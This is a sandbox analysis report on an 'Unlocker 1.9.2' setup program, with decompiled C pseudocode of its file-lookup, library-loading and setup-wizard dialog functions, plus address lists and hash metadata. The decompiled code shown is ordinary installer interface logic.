                                                                                                                                                              0x00406315
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406365
                                                                                                                                                              0x00406369
                                                                                                                                                              0x00406370
                                                                                                                                                              0x00406373
                                                                                                                                                              0x00406376
                                                                                                                                                              0x00406380
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406380
                                                                                                                                                              0x0040636b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040638c
                                                                                                                                                              0x00406390
                                                                                                                                                              0x00406397
                                                                                                                                                              0x0040639a
                                                                                                                                                              0x0040639d
                                                                                                                                                              0x00406392
                                                                                                                                                              0x00406392
                                                                                                                                                              0x00406392
                                                                                                                                                              0x004063a0
                                                                                                                                                              0x004063a3
                                                                                                                                                              0x004063a6
                                                                                                                                                              0x004063a6
                                                                                                                                                              0x004063a9
                                                                                                                                                              0x004063ac
                                                                                                                                                              0x004063af
                                                                                                                                                              0x004063af
                                                                                                                                                              0x004063b2
                                                                                                                                                              0x004063b9
                                                                                                                                                              0x004063be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040644c
                                                                                                                                                              0x0040644c
                                                                                                                                                              0x00406450
                                                                                                                                                              0x004067ee
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ee
                                                                                                                                                              0x00406456
                                                                                                                                                              0x00406459
                                                                                                                                                              0x0040645c
                                                                                                                                                              0x00406460
                                                                                                                                                              0x00406463
                                                                                                                                                              0x00406469
                                                                                                                                                              0x0040646b
                                                                                                                                                              0x0040646b
                                                                                                                                                              0x0040646b
                                                                                                                                                              0x0040646e
                                                                                                                                                              0x00406471
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064d3
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064dc
                                                                                                                                                              0x004064df
                                                                                                                                                              0x004064e3
                                                                                                                                                              0x004064e6
                                                                                                                                                              0x004064ec
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x004062a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065de
                                                                                                                                                              0x004065e2
                                                                                                                                                              0x00406604
                                                                                                                                                              0x00406607
                                                                                                                                                              0x00406611
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406611
                                                                                                                                                              0x004065e4
                                                                                                                                                              0x004065e7
                                                                                                                                                              0x004065eb
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040669b
                                                                                                                                                              0x0040669f
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066c4
                                                                                                                                                              0x004066cb
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066a1
                                                                                                                                                              0x004066a4
                                                                                                                                                              0x004066a7
                                                                                                                                                              0x004066aa
                                                                                                                                                              0x004066b1
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040678c
                                                                                                                                                              0x0040678f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063c6
                                                                                                                                                              0x004063c8
                                                                                                                                                              0x004063cf
                                                                                                                                                              0x004063d0
                                                                                                                                                              0x004063d2
                                                                                                                                                              0x004063d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063e0
                                                                                                                                                              0x004063e3
                                                                                                                                                              0x004063e5
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e8
                                                                                                                                                              0x004063eb
                                                                                                                                                              0x004063f2
                                                                                                                                                              0x004063f5
                                                                                                                                                              0x00406403
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066dc
                                                                                                                                                              0x004066e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066ec
                                                                                                                                                              0x00406824
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406824
                                                                                                                                                              0x004066f2
                                                                                                                                                              0x004066f5
                                                                                                                                                              0x004066f8
                                                                                                                                                              0x004066fc
                                                                                                                                                              0x004066ff
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                                                                                                                                              • Instruction ID: ffbedf2a53f09e030cb941e21afd419a8c3069ec791793070072d3341ca218b9
                                                                                                                                                              • Opcode Fuzzy Hash: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                                                                                                                                              • Instruction Fuzzy Hash: 17F16571D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A86CF44
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405CD8(CHAR* _a4) {
                                                                                                                                                              				void* _t2;
                                                                                                                                                              
                                                                                                                                                              				_t2 = FindFirstFileA(_a4, 0x4224c8); // executed
                                                                                                                                                              				if(_t2 == 0xffffffff) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				FindClose(_t2);
                                                                                                                                                              				return 0x4224c8;
                                                                                                                                                              			}





                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,004224C8,C:\,004055F4,C:\,C:\,00000000,C:\,C:\,?,?,00000000,00405316,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405CE3
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405CEF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                              • String ID: C:\
                                                                                                                                                              • API String ID: 2295610775-3404278061
                                                                                                                                                              • Opcode ID: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                                                                                              • Instruction ID: 9a18407f5d3c0b203e51d924b64f4f6f4a008a27543408caa796c3d3b713bef8
                                                                                                                                                              • Opcode Fuzzy Hash: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                                                                                              • Instruction Fuzzy Hash: 91D0C93594D620ABD6012728AD0884B6A589B153317508B32F46AE22E0C7748C529AA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405CFF(signed int _a4) {
                                                                                                                                                              				struct HINSTANCE__* _t5;
                                                                                                                                                              				CHAR* _t7;
                                                                                                                                                              				signed int _t9;
                                                                                                                                                              
                                                                                                                                                              				_t9 = _a4 << 3;
                                                                                                                                                              				_t7 =  *(_t9 + 0x409200);
                                                                                                                                                              				_t5 = GetModuleHandleA(_t7);
                                                                                                                                                              				if(_t5 != 0) {
                                                                                                                                                              					L2:
                                                                                                                                                              					return GetProcAddress(_t5,  *(_t9 + 0x409204));
                                                                                                                                                              				}
                                                                                                                                                              				_t5 = LoadLibraryA(_t7); // executed
                                                                                                                                                              				if(_t5 != 0) {
                                                                                                                                                              					goto L2;
                                                                                                                                                              				}
                                                                                                                                                              				return _t5;
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 310444273-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E004038BC(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                                                                              				struct HWND__* _v32;
                                                                                                                                                              				void* _v84;
                                                                                                                                                              				void* _v88;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				signed int _t35;
                                                                                                                                                              				signed int _t37;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              				intOrPtr _t44;
                                                                                                                                                              				struct HWND__* _t49;
                                                                                                                                                              				signed int _t67;
                                                                                                                                                              				struct HWND__* _t73;
                                                                                                                                                              				signed int _t86;
                                                                                                                                                              				struct HWND__* _t91;
                                                                                                                                                              				signed int _t99;
                                                                                                                                                              				int _t103;
                                                                                                                                                              				signed int _t115;
                                                                                                                                                              				signed int _t116;
                                                                                                                                                              				int _t117;
                                                                                                                                                              				signed int _t122;
                                                                                                                                                              				struct HWND__* _t125;
                                                                                                                                                              				struct HWND__* _t126;
                                                                                                                                                              				int _t127;
                                                                                                                                                              				long _t130;
                                                                                                                                                              				int _t132;
                                                                                                                                                              				int _t133;
                                                                                                                                                              				void* _t134;
                                                                                                                                                              				void* _t141;
                                                                                                                                                              				void* _t142;
                                                                                                                                                              
                                                                                                                                                              				_t115 = _a8;
                                                                                                                                                              				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                                                                                              					_t35 = _a12;
                                                                                                                                                              					_t125 = _a4;
                                                                                                                                                              					__eflags = _t115 - 0x110;
                                                                                                                                                              					 *0x42045c = _t35;
                                                                                                                                                              					if(_t115 == 0x110) {
                                                                                                                                                              						 *0x423e88 = _t125;
                                                                                                                                                              						 *0x420470 = GetDlgItem(_t125, 1);
                                                                                                                                                              						_t91 = GetDlgItem(_t125, 2);
                                                                                                                                                              						_push(0xffffffff);
                                                                                                                                                              						_push(0x1c);
                                                                                                                                                              						 *0x41f438 = _t91;
                                                                                                                                                              						E00403D8F(_t125);
                                                                                                                                                              						SetClassLongA(_t125, 0xfffffff2,  *0x423668); // executed
                                                                                                                                                              						 *0x42364c = E0040140B(4);
                                                                                                                                                              						_t35 = 1;
                                                                                                                                                              						__eflags = 1;
                                                                                                                                                              						 *0x42045c = 1;
                                                                                                                                                              					}
                                                                                                                                                              					_t122 =  *0x4091a4; // 0x8
                                                                                                                                                              					_t133 = 0;
                                                                                                                                                              					_t130 = (_t122 << 6) +  *0x423ea0;
                                                                                                                                                              					__eflags = _t122;
                                                                                                                                                              					if(_t122 < 0) {
                                                                                                                                                              						L34:
                                                                                                                                                              						E00403DDB(0x40b);
                                                                                                                                                              						while(1) {
                                                                                                                                                              							_t37 =  *0x42045c;
                                                                                                                                                              							 *0x4091a4 =  *0x4091a4 + _t37;
                                                                                                                                                              							_t130 = _t130 + (_t37 << 6);
                                                                                                                                                              							_t39 =  *0x4091a4; // 0x8
                                                                                                                                                              							__eflags = _t39 -  *0x423ea4; // 0x8
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								E0040140B(1);
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *0x42364c - _t133; // 0x0
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							_t44 =  *0x423ea4; // 0x8
                                                                                                                                                              							__eflags =  *0x4091a4 - _t44; // 0x8
                                                                                                                                                              							if(__eflags >= 0) {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							_t116 =  *(_t130 + 0x14);
                                                                                                                                                              							E004059FF(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                                                                                              							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                                                                                              							_push(0xfffffc19);
                                                                                                                                                              							E00403D8F(_t125);
                                                                                                                                                              							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                                                                                              							_push(0xfffffc1b);
                                                                                                                                                              							E00403D8F(_t125);
                                                                                                                                                              							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                                                                                              							_push(0xfffffc1a);
                                                                                                                                                              							E00403D8F(_t125);
                                                                                                                                                              							_t49 = GetDlgItem(_t125, 3);
                                                                                                                                                              							__eflags =  *0x423f0c - _t133; // 0x0
                                                                                                                                                              							_v32 = _t49;
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                                                                                              								__eflags = _t116;
                                                                                                                                                              							}
                                                                                                                                                              							ShowWindow(_t49, _t116 & 0x00000008); // executed
                                                                                                                                                              							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
                                                                                                                                                              							E00403DB1(_t116 & 0x00000002);
                                                                                                                                                              							_t117 = _t116 & 0x00000004;
                                                                                                                                                              							EnableWindow( *0x41f438, _t117); // executed
                                                                                                                                                              							__eflags = _t117 - _t133;
                                                                                                                                                              							if(_t117 == _t133) {
                                                                                                                                                              								_push(1);
                                                                                                                                                              							} else {
                                                                                                                                                              								_push(_t133);
                                                                                                                                                              							}
                                                                                                                                                              							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                                                                                              							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                                                                                                              							__eflags =  *0x423f0c - _t133; // 0x0
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_push( *0x420470);
                                                                                                                                                              							} else {
                                                                                                                                                              								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                                                                                              								_push( *0x41f438);
                                                                                                                                                              							}
                                                                                                                                                              							E00403DC4();
                                                                                                                                                              							E004059DD(0x420478, "Unlocker 1.9.2 Setup");
                                                                                                                                                              							E004059FF(0x420478, _t125, _t130,  &(0x420478[lstrlenA(0x420478)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                                                                                              							SetWindowTextA(_t125, 0x420478); // executed
                                                                                                                                                              							_push(_t133);
                                                                                                                                                              							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                                                                                              							__eflags = _t67;
                                                                                                                                                              							if(_t67 != 0) {
                                                                                                                                                              								continue;
                                                                                                                                                              							} else {
                                                                                                                                                              								__eflags =  *_t130 - _t133;
                                                                                                                                                              								if( *_t130 == _t133) {
                                                                                                                                                              									continue;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *(_t130 + 4) - 5;
                                                                                                                                                              								if( *(_t130 + 4) != 5) {
                                                                                                                                                              									DestroyWindow( *0x423658); // executed
                                                                                                                                                              									 *0x41fc48 = _t130;
                                                                                                                                                              									__eflags =  *_t130 - _t133;
                                                                                                                                                              									if( *_t130 <= _t133) {
                                                                                                                                                              										goto L58;
                                                                                                                                                              									}
                                                                                                                                                              									_t73 = CreateDialogParamA( *0x423e80,  *_t130 +  *0x423660 & 0x0000ffff, _t125,  *(0x4091a8 +  *(_t130 + 4) * 4), _t130); // executed
                                                                                                                                                              									__eflags = _t73 - _t133;
                                                                                                                                                              									 *0x423658 = _t73;
                                                                                                                                                              									if(_t73 == _t133) {
                                                                                                                                                              										goto L58;
                                                                                                                                                              									}
                                                                                                                                                              									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                                                                                              									_push(6);
                                                                                                                                                              									E00403D8F(_t73);
                                                                                                                                                              									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                                                                                              									ScreenToClient(_t125, _t134 + 0x10);
                                                                                                                                                              									SetWindowPos( *0x423658, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                                                                                              									_push(_t133);
                                                                                                                                                              									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                                                                                              									__eflags =  *0x42364c - _t133; // 0x0
                                                                                                                                                              									if(__eflags != 0) {
                                                                                                                                                              										goto L61;
                                                                                                                                                              									}
                                                                                                                                                              									ShowWindow( *0x423658, 8); // executed
                                                                                                                                                              									E00403DDB(0x405);
                                                                                                                                                              									goto L58;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *0x423f0c - _t133; // 0x0
                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                              									goto L61;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *0x423f00 - _t133; // 0x20
                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                              									continue;
                                                                                                                                                              								}
                                                                                                                                                              								goto L61;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						DestroyWindow( *0x423658); // executed
                                                                                                                                                              						 *0x423e88 = _t133;
                                                                                                                                                              						EndDialog(_t125,  *0x41f840);
                                                                                                                                                              						goto L58;
                                                                                                                                                              					} else {
                                                                                                                                                              						__eflags = _t35 - 1;
                                                                                                                                                              						if(_t35 != 1) {
                                                                                                                                                              							L33:
                                                                                                                                                              							__eflags =  *_t130 - _t133;
                                                                                                                                                              							if( *_t130 == _t133) {
                                                                                                                                                              								goto L61;
                                                                                                                                                              							}
                                                                                                                                                              							goto L34;
                                                                                                                                                              						}
                                                                                                                                                              						_push(0);
                                                                                                                                                              						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                                                                                                              						__eflags = _t86;
                                                                                                                                                              						if(_t86 == 0) {
                                                                                                                                                              							goto L33;
                                                                                                                                                              						}
                                                                                                                                                              						SendMessageA( *0x423658, 0x40f, 0, 1);
                                                                                                                                                              						__eflags =  *0x42364c - _t133; // 0x0
                                                                                                                                                              						return 0 | __eflags == 0x00000000;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t125 = _a4;
                                                                                                                                                              					_t133 = 0;
                                                                                                                                                              					if(_t115 == 0x47) {
                                                                                                                                                              						SetWindowPos( *0x420450, _t125, 0, 0, 0, 0, 0x13);
                                                                                                                                                              					}
                                                                                                                                                              					if(_t115 == 5) {
                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                              						ShowWindow( *0x420450,  ~(_a12 - 1) & _t115);
                                                                                                                                                              					}
                                                                                                                                                              					if(_t115 != 0x40d) {
                                                                                                                                                              						__eflags = _t115 - 0x11;
                                                                                                                                                              						if(_t115 != 0x11) {
                                                                                                                                                              							__eflags = _t115 - 0x111;
                                                                                                                                                              							if(_t115 != 0x111) {
                                                                                                                                                              								L26:
                                                                                                                                                              								return E00403DF6(_t115, _a12, _a16);
                                                                                                                                                              							}
                                                                                                                                                              							_t132 = _a12 & 0x0000ffff;
                                                                                                                                                              							_t126 = GetDlgItem(_t125, _t132);
                                                                                                                                                              							__eflags = _t126 - _t133;
                                                                                                                                                              							if(_t126 == _t133) {
                                                                                                                                                              								L13:
                                                                                                                                                              								__eflags = _t132 - 1;
                                                                                                                                                              								if(_t132 != 1) {
                                                                                                                                                              									__eflags = _t132 - 3;
                                                                                                                                                              									if(_t132 != 3) {
                                                                                                                                                              										_t127 = 2;
                                                                                                                                                              										__eflags = _t132 - _t127;
                                                                                                                                                              										if(_t132 != _t127) {
                                                                                                                                                              											L25:
                                                                                                                                                              											SendMessageA( *0x423658, 0x111, _a12, _a16);
                                                                                                                                                              											goto L26;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags =  *0x423f0c - _t133; // 0x0
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											_t99 = E0040140B(3);
                                                                                                                                                              											__eflags = _t99;
                                                                                                                                                              											if(_t99 != 0) {
                                                                                                                                                              												goto L26;
                                                                                                                                                              											}
                                                                                                                                                              											 *0x41f840 = 1;
                                                                                                                                                              											L21:
                                                                                                                                                              											_push(0x78);
                                                                                                                                                              											L22:
                                                                                                                                                              											E00403D68();
                                                                                                                                                              											goto L26;
                                                                                                                                                              										}
                                                                                                                                                              										E0040140B(_t127);
                                                                                                                                                              										 *0x41f840 = _t127;
                                                                                                                                                              										goto L21;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags =  *0x4091a4 - _t133; // 0x8
                                                                                                                                                              									if(__eflags <= 0) {
                                                                                                                                                              										goto L25;
                                                                                                                                                              									}
                                                                                                                                                              									_push(0xffffffff);
                                                                                                                                                              									goto L22;
                                                                                                                                                              								}
                                                                                                                                                              								_push(_t132);
                                                                                                                                                              								goto L22;
                                                                                                                                                              							}
                                                                                                                                                              							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                                                                                                                              							_t103 = IsWindowEnabled(_t126);
                                                                                                                                                              							__eflags = _t103;
                                                                                                                                                              							if(_t103 == 0) {
                                                                                                                                                              								goto L61;
                                                                                                                                                              							}
                                                                                                                                                              							goto L13;
                                                                                                                                                              						}
                                                                                                                                                              						SetWindowLongA(_t125, _t133, _t133);
                                                                                                                                                              						return 1;
                                                                                                                                                              					} else {
                                                                                                                                                              						DestroyWindow( *0x423658); // executed
                                                                                                                                                              						 *0x423658 = _a12;
                                                                                                                                                              						L58:
                                                                                                                                                              						_t141 =  *0x421478 - _t133; // 0x1
                                                                                                                                                              						if(_t141 == 0) {
                                                                                                                                                              							_t142 =  *0x423658 - _t133; // 0x14005a
                                                                                                                                                              							if(_t142 != 0) {
                                                                                                                                                              								ShowWindow(_t125, 0xa); // executed
                                                                                                                                                              								 *0x421478 = 1;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						L61:
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}

































                                                                                                                                                              0x00403afc
                                                                                                                                                              0x00403b01
                                                                                                                                                              0x00403b07
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403b10
                                                                                                                                                              0x00403b18
                                                                                                                                                              0x00403b1d
                                                                                                                                                              0x00403b20
                                                                                                                                                              0x00403b26
                                                                                                                                                              0x00403b2b
                                                                                                                                                              0x00403b2e
                                                                                                                                                              0x00403b34
                                                                                                                                                              0x00403b39
                                                                                                                                                              0x00403b3c
                                                                                                                                                              0x00403b42
                                                                                                                                                              0x00403b4a
                                                                                                                                                              0x00403b50
                                                                                                                                                              0x00403b56
                                                                                                                                                              0x00403b5a
                                                                                                                                                              0x00403b61
                                                                                                                                                              0x00403b61
                                                                                                                                                              0x00403b61
                                                                                                                                                              0x00403b6b
                                                                                                                                                              0x00403b7d
                                                                                                                                                              0x00403b89
                                                                                                                                                              0x00403b8e
                                                                                                                                                              0x00403b98
                                                                                                                                                              0x00403b9e
                                                                                                                                                              0x00403ba0
                                                                                                                                                              0x00403ba5
                                                                                                                                                              0x00403ba2
                                                                                                                                                              0x00403ba2
                                                                                                                                                              0x00403ba2
                                                                                                                                                              0x00403bb5
                                                                                                                                                              0x00403bcd
                                                                                                                                                              0x00403bcf
                                                                                                                                                              0x00403bd5
                                                                                                                                                              0x00403bea
                                                                                                                                                              0x00403bd7
                                                                                                                                                              0x00403be0
                                                                                                                                                              0x00403be2
                                                                                                                                                              0x00403be2
                                                                                                                                                              0x00403bf0
                                                                                                                                                              0x00403c00
                                                                                                                                                              0x00403c11
                                                                                                                                                              0x00403c18
                                                                                                                                                              0x00403c1e
                                                                                                                                                              0x00403c22
                                                                                                                                                              0x00403c27
                                                                                                                                                              0x00403c29
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c2f
                                                                                                                                                              0x00403c2f
                                                                                                                                                              0x00403c31
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c37
                                                                                                                                                              0x00403c3b
                                                                                                                                                              0x00403c60
                                                                                                                                                              0x00403c66
                                                                                                                                                              0x00403c6c
                                                                                                                                                              0x00403c6e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c94
